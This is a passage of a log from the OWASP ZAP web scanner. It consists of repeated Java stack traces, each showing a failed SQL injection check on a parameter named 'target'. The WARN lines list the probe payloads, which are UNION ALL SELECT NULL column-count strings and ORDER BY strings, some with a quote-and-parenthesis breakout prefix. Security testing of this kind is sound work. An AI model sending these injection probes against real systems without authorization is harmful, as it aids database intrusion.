org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685622 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685623 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685625 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685627 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685629 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685631 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685633 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685635 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685636 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685637 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685638 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685640 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') ORDER BY 4107#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685641 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685642 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685645 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685648 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown 